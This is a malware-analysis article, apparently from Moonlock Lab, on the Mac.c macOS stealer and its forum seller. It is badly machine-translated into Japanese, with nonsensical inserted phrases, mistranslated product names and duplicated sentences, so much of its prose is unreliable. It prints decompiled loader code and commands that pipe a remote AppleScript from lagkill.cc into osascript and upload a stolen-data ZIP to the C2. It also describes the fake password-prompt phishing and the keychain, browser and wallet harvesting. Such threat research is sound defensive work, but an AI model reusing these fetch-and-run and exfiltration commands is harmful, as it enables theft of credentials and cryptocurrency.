Mac.c 泥棒の物語は、大規模なキャンペーンや侵入から始まらないが、ダークネットフォーラムの狭い隅々から始まるが、そこで「mentalpositive」という名前の脅威俳優が最初に現れ、彼を他の泥棒開発者と区別した異常な特徴で注目を集めている。 MacPawのサイバーセキュリティ部門は、過去4カ月間にわたって mentalpositive を追跡してきました. We can already see that it is a new actor taking advantage of a macOS malware market that remains far less saturated than its Windows counterpart, marking the rise of the new wave of threat actors who are both technically skilled and commercially ambitious. MacPawのサイバーセキュリティ部門は、MacOSのマルウェア市場の恩恵を受ける新たなプレイヤーであり、技術的に熟練し、商業的に野心的な脅威の新たな波の上昇を示しています。 ムーンロック 最近活動しているにもかかわらず、Mac.c はすでに、より大きな、より確立された盗賊作戦と競い合っている。 アマゾンからお金を借りると、 マルウェアは、より速く、高影響力のデータ盗難に適応しています。より多くのURLがコマンド&コントロールインフラストラクチャに追加されるにつれて、Mac.cはmacOSユーザーをターゲットにしたより大きな地下生態系の一部であるように見えます。 原子力 macOS Stealer ロドリヒ4 「精神的ポジティブ」の共有された進捗状況のアップデートや、Mac.c ビルドに関するフィードバックさえも集められています - 典型的に秘密の macOS マルウェア開発の世界で驚くほどのオープンさです。 この記事では、Mac.c の進化を追跡し、MentalPositive の戦術を解除し、この泥棒がどのようにApple プラットフォームをターゲットとする脅威の広範囲に適合するかを調べます。 市場に新たなプレイヤー 約4カ月前、Moonlock Labは最初にMac.c 泥棒の出現に気づき、「mentalpositive」というアライアンスの下で開発者にそれを割り当てた。この脅威の俳優は、macOS マルウェア市場に参入する多くの新しいプレイヤーの1人で、Windows ターゲットマルウェア業界よりもはるかに混雑しているスペースでした。 他の脅威のプレイヤーと同様に、「mentalpositive」は、マルウェア開発の最近のトレンドを採用しています:さまざまなキャンペーンで使用するためのモジュラーアーキテクチャ、高度な遮蔽技術、およびますます複雑なコマンド&コントロール(C2)インフラストラクチャ。 しかし、MentalPositiveのMac.cのターゲットプロフィールとデータエクスフィルタの範囲は顕著です. それは、iCloud Keychainの認証情報、ブラウザで保存されたパスワード、暗号財布、システムメタデータ、およびmacOS上の特定の場所からのファイルを収集します - すべてフィッシングによって得られた認証情報を使用します. 標準的なシステムAPIとステージ化されたコミュニケーション方法に依存することによって、それは多くの伝統的なエンドポイント防御を回避します。 公共の建物 テクニカルデザインを超えて、「mentalpositive」は、ダークネットフォーラムで異常な行動を示し、数カ月間にわたって、この脅威俳優は地下のフォーラムを使用して、Mac.c へのアップデートを増加させ、潜在的なユーザーと関わり、積極的にフィードバックを求めました。 このような広告は、視界を高め、明確な市場存在を引き出そうとする意図を示す可能性があります。また、macOSの脅威ニッチをターゲットにしたカスタマイズされた盗賊としてのサービスビジネスモデルの基盤を築くように見えます。 下のスクリーンショットは、新しい機能が発表されたときにフォーラムの投稿がどのように進化したかを示しています。オリジナルの投稿がロシア語で書かれたので、私たちはそれぞれのための簡潔な説明を含みました。 後に「mentalpositive」は、Mac.cの機能の詳細な説明を共有し、最も注目すべきアップデートのいくつかは、元のLedger Liveアプリの置き換え、ファイルのバイナリサイズの減少(より速いダウンロードと静的分析を通じて潜在的により少ない検出可能なアーティファクト)と管理パネルの最適化を含む。 この文脈では、パネルは、Mac.c 泥棒の購入者である「mentalpositive」の顧客のためのウェブベースのインターフェイスを指し、マルウェアビルドを作成し、感染症(成功した試みと失敗した試みを含む)を追跡し、その他のキャンペーンの詳細を管理することができます。 前述したように、「mentalpositive」は、開発が進行中であることを示すことで、潜在的な顧客を関与させるためにフォーラムのトレードを頻繁に更新しました。以下は、脅威行為者が、macOSのバージョンの最新バージョンを 10.12.6 以上のバージョンに対してテストしたと主張するこのような更新の例です。 トックスとジャッバー 電報 最後に、書く時点で最も最近の投稿は、追加のアップデートを概説しています。これには、ゼロからのユニークなビルディングを生成することによってXProtectを回避すること、サポートされているブラウザの拡張リスト、コントロールパネル経由でファイルゲーバーのアクティベーション、そして最も注目すべきは、フィッシングTrezor種子フレーズのための別々のモジュールが含まれています。 AMOSの類似点 興味深いことに、競合する泥棒の背後にある一部の開発者は、Mac.c コードのオリジナリティに疑問を投げかけ、有名な Atomic macOS Stealer の変更されたバージョンである可能性があることを示唆しています。 Moonlock Labは、両方の泥棒の最新のパイロードを分析し、比較し、AMOSは詳細にカバーされています。 両方のコードは同一の部分を共有しているが、「mentalpositive」によって実装される機能は大幅に制限されている。 私たちの最近の記事の一つ (赤色で強調) AMOS SHA256: 54b9576aad25d54d703adb9a26feaa5d80f44b94731ff8ecff7cf1ebc15cf3ff 野生で初めて見たもの: 2025-06-19 20:18:55 ' (緑色で強調) mentalpositive タイトル: 7dfd77f09a90d8d01a7d74a84685645622ae87a90b5dd72a5750daac9195c467 野生で初めて見たもの: 2025-07-01 15:41:49 詳細な検査では、Mac.c と Atomic macOS Stealer の間で機能レベルのコードが大幅に再利用されていることが明らかになりました。 機能的には、両方の盗賊は、macOS システム上の包括的なデータ盗難のために設計されたほぼ同一の機能セットを共有しているが、両方のケースでは、これらの機能は、ネイティブの macOS ツールとスクリプトを使用して実行され、外部依存を最小限に抑え、回避を改善する。 共通の内部面にもかかわらず、AMOSは持続性、モジュラリティ、ターゲット化の重要な進歩を導入しています。 Mac.c はコンパクトで非持続的な AppleScript ベースの盗賊として機能する一方で、Atomic macOS Stealer は、同じ設計哲学のより高度で持続的でモジュール化された脅威を表しています。 コードの再利用の高いレベルは、マルウェア開発の macOS サークル内での割り当て、ビルダーの可用性、および潜在的な協力に関する重要な質問を引き起こします。 Mac.c Stealer が機能する方法 すでに言及されている中 それ以来、彼らのオペレーティングドメインは変わりませんでした: https://lagkill[.]cc. それは、被害者を追跡し、いくつかのエクスフィルタリング手順のために使用されるPHPファイルをホストします。 'mentalpositive' Moonlock Labの記事一覧 このドメインには複数の Mach-O ファイルとの関係がありますが、一般的に、ワークフローは 2 つの段階にまとめられます: Mach-O 初期実行可能および AppleScript パイロード。 ステップ1:Mach-O Initial Executable Mac.c 泥棒は、複数の段階の実行戦略を採用し、その最初の段階は、隠れた展開、環境浄化、および次の有用な負荷の制御された配達に責任を有する軽量ロッダーとして機能します。以下は、サンプル 90309fc3b90df1d7b6d7b7d747c5afa63fca6262721ce39c34da4b13901d53b919a3の逆エンジニアリングに基づくこの段階の詳細な分解です。 undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } Mac.c 入力ポイント (entry()) は、現在のプロセスをフォーキングし、setsid() 経由で新しいセッションを作成することから始まり、効果的にマルウェアを任意の制御端末から切り離し、バックグラウンドで実行することができます。 さらに、すべての標準入力、出力、およびエラー ストリームを freopen() を使用して /dev/null にリダイレクトする基本的な機能を観察しました。 マルウェアはコマンド・アンド・コントロール(C2)ドメインをハードコードする: lagkill[.]cc. It also generates a unique victim identifier by concatenating multiple static hexadecimal strings. This results in a pseudo-unique txd token, used to fingerprint the infected host or to trace infection batches during C2 communication. マルウェアはまた、複数の静的六十字符串を連結することによってユニークな被害者識別子を生成します。 この段階の鍵となるアクションは、リモートのAppleScriptを取得し、実行することです。これは、パイロードをダウンロードし、すぐに実行するために、Chaining curlとosascriptによって達成されます。 curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript この方法により、攻撃者はローダーを変更せずにパイロットを動的に更新することができ、間接的な実行パスにより割り当てが難しくなります。 AppleScript を実行した後(現地データ盗難を実行する可能性があります)では、ロードヤーは成功をチェックし、ZIP アーカイブを同じ C2 サーバーに再フィルタリングします。 curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/ このアップロードは、カスタムヘッダー(cl: 0)と寛大なタイムアウトを使用して送信され、より遅いシステムに対応し、運用安定性に注意を払うことを示唆しています。 ステップ2:AppleScript Payload Mac.c 泥棒の第2段階は、実際のダメージが始まる場所です。AppleScript パイロットは、ネイティブの macOS スクリプト機能を活用して、幅広い範囲の機密データを抽出します。驚くべきことに、コンパイルされたバイナリを落とすことなく、または高い特権を必要とし、フィッシングされたパスワードで十分です。 下記では、第2段階のパイロードの戦術をカテゴリごとに分割します。 Credential theft & CLI abuse このスクリプトは、ユーザーのパスワードを要求する偽のシステムプロンプトを起動します. This is stored in plaintext and reused later. その後、セキュリティ CLI ユーティリティを黙々と呼び出し、キーチェーンから保存された認証情報を抽出し、Google Chrome と Chromium ベースのアプリを特定的にターゲットにします。 収集したデータは /tmp/<random>/Password に書きます。 このフィッシング戦術は、ネイティブな信頼性と既知の macOS インターフェイスを活用して、ユーザーの懐疑主義を回避します。 Browser and extensions data theft ターゲットブラウザにはChrome、Edge、Brave、Yandexが含まれます。 抽出されたファイルには、ログインデータ、クッキー、Webデータ、IndexedDBストレージが含まれます。 最後に、スクリプトは、MetaMask、Phantom、Binance Walletなどの有名な仮想通貨の拡張子の数百を繰り返し、ローカルストレージファイルやセッションアーティファクトを引っ張ります。 すべてのブラウザ関連のロートは /tmp/<random>/Browsers/. Hot wallet and crypto app harvesting パイロードは、以下を含む人気のデスクトップの暗号財布の存在をスキャンします。 電気 エクスポート コイン 原子力 モネロ ワサビ Ledger LIVE 財布ファイルや構成データベース(例えば、LevelDBディレクトリ)などの関連データは、 /tmp/<random>/Cryptowallets/にコピーされます。 これは明確な財政的動機を示し、macOSの仮想通貨愛好家のユーザーベースをターゲットにした。 File-grabber and its logic インテリジェンス値を最大限に抑えながら足跡を最小限に抑えるために、スクリプトは以下のことを行います。 ユーザーのデスクトップ、ドキュメント、ダウンロード フォルダを再度検索します。 高値ファイルタイプのフィルター: .wallet、 .seed、 .txt、 .keys、 .pdf、 .docx。 ファイルサイズの制限値: 10MB このアプローチでは、潜在的な種子フレーズ、回復キー、および敏感な PDF を含む低騒音、高信号ファイルを優先します。 Collection of messaging and app artifacts Mac.c は tdata フォルダをコピーし、アクティブなセッション トークンまたはキャッシュ メッセージ (Telegram に接続されているメッセージ) を含むことができます。 Binance および Ton Keeper アプリからの構成ファイルもコピーされ、財布の使用、ログインパターン、または保存されたキーの洞察を提供します。 system_profiler を使用して、ハードウェア、macOS、およびディスプレイデータを収集します。 この幅広いスワップは、ユーザーの文脈を再構築する意図を示し、単に資産をエクスフィルタするのではありません。 Archiving and exfiltration 収集されたすべてのデータは、構造化された一時ディレクトリ /tmp/<random>/. macOS のネイティブアーカイブツールである ditto -c -k を使用すると、ディレクトリ全体が /tmp/osalogging.zip に zip されます。 アーカイブ後、パイロットは終了します. 背景のモニタリングや繰り返しの実行はありません。 この隠蔽に焦点を当てた、エフェメリアルなデザインは、たぶん一度のアクセスを目的とするか、またはより大きな感染チェーンの部分として、迅速なブッシュとグラブ操作を示しています。 フィッシング戦略 特に「mentalpositive」の第2段階のパイロードに使用される欺瞞的なテクニックは、ゲームの許可要求として仮装された偽のシステムプロンプトを含みます。 ファイルを保存する」 無邪気な魔女 さらに、そのようなパイロードは、この特定のキャンペーンに関連する感染症を特定するために使用される可能性のある「無実」(または、いくつかの場合、「無実」)のビルドタグが付属しています。 最後に、このキャンペーンのための特別にレンタルされたドメインは、Innocentwitches[.]top ですが、 root URL は Google にリダイレクトしますが、それはまた /upload.php ルートを含み、脅威行為者が盗まれたデータを受け取ることができます。 結論 Macコンピュータは、平均的なユーザーと特に暗号の所有者の間で人気が増加し続けているため、盗賊は能力だけでなく、市場シェアと影響力で拡大することを期待しています。 Mac.c は孤立したケースではありませんが、プロフェッショナルな macOS マルウェア開発に向かう傾向の一部です。人気の Atomic Stealer からの主要な機能とアーキテクチャー要素を再利用する一方で、macOS 泥棒に新しさをもたらし、それらを異なる軌道に置きます。 我々が目撃しているのは、新たなビジネスモデルの出現であるかもしれない: stealer-as-a-service は、macOS ユーザーを対象とし、より広範なマルウェア-as-a-service 業界から分岐している。 IOC https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php 33e9b605406ffb779dc912a1ce66436a8867b88e087bc34b2b2b2fca2160b64ca7
